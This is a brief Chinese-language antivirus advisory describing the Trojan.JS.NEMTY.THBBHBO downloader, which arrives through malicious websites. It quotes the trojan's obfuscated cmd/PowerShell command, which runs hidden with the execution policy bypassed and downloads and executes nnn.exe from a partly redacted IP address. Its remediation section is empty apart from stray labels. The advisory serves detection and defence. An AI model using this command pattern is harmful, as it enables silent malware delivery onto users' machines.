Trojan.JS.NEMTY.THBBHBO 木馬程式在瀏覽惡意網站時會下載惡意檔案至電腦上

防毒軟體廠商近期發現 Trojan.JS.NEMTY.THBBHBO 木馬程式，利用在瀏覽惡意網站時在未發覺情形下載惡意檔案。

• Windows

若不慎已感染此病毒，建議處理方式如下：

• trendmicro

該木馬以其他惡意軟體丟棄的文件或用戶訪問惡意站點時在不知不覺中下載的文件 的形式到達系統。

安裝

該木馬添加了以下過程：

• “%System%\cmd.exe” /c hMLWtlbsdHkTjom & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1=\’\’Net.W\’\’; $v2=\’\’ebClient\’\’; $var = (New-Object $v1$v2); $var.Headers[\’\’User-Agent\’\’] = \’\’Google Chrome\’\’; $var.downloadfile(\’\’http://{BLOCKED}.{BLOCKED}.197.190/nnn.exe\’\’,\’\’%temp%erb19.exe\’\’); & %temp%erb19.exe & OWNHgawUJSfreRD
  
  下載例程
  
  該木馬程式連接到以下網站，以下載並執行惡意文件：
• http：// {BLOCKED}。{BLOCKED} .197.190 / nnn.exe
  
  它從以下URL下載文件，然後在存儲在受影響的系統中之前重命名它們：
• ％User Temp％erb19.exe